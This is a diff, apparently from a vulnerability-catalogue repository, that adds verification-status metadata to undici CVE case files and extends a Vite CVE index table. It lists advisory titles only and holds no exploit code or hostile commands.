@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-
# undici Denial of Service attack via bad certificate data # undici Denial of Service attack via bad certificate data
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2025-47279` - Canonical ID: `undici--CVE-2025-47279`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:19:54.772219Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-
# Undici has an HTTP Request/Response Smuggling issue # Undici has an HTTP Request/Response Smuggling issue
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1525` - Canonical ID: `undici--CVE-2026-1525`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.563997Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-
# Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression # Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1526` - Canonical ID: `undici--CVE-2026-1526`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.572106Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-4992-
# Undici has CRLF Injection in undici via `upgrade` option # Undici has CRLF Injection in undici via `upgrade` option
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1527` - Canonical ID: `undici--CVE-2026-1527`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:17:45.838435Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-f269-
# Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client # Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-1528` - Canonical ID: `undici--CVE-2026-1528`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:56:17.456091Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-
# Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion # Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-22036` - Canonical ID: `undici--CVE-2026-22036`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:26.149214Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-
# Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation # Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-2229` - Canonical ID: `undici--CVE-2026-2229`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.417862Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-
# Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS # Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `undici--CVE-2026-2581` - Canonical ID: `undici--CVE-2026-2581`

34
07-framework-security/frameworks/vite/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `12` - 总案例数: `12`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `12` - 重点 Markdown 案例数: `12`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `12`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,17 +30,17 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) | | vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) |
| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) | | Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) |
| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) | | Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) |
| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) | | Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) |
| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) | | Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) |
| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) | | Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) |
| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) | | Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) |
| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) | | Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) |
| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) | | Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) |
| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) | | Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) |
| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) | | Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) |
| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) | | Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) |

某些文件未显示,因为此 diff 中更改的文件太多 显示更多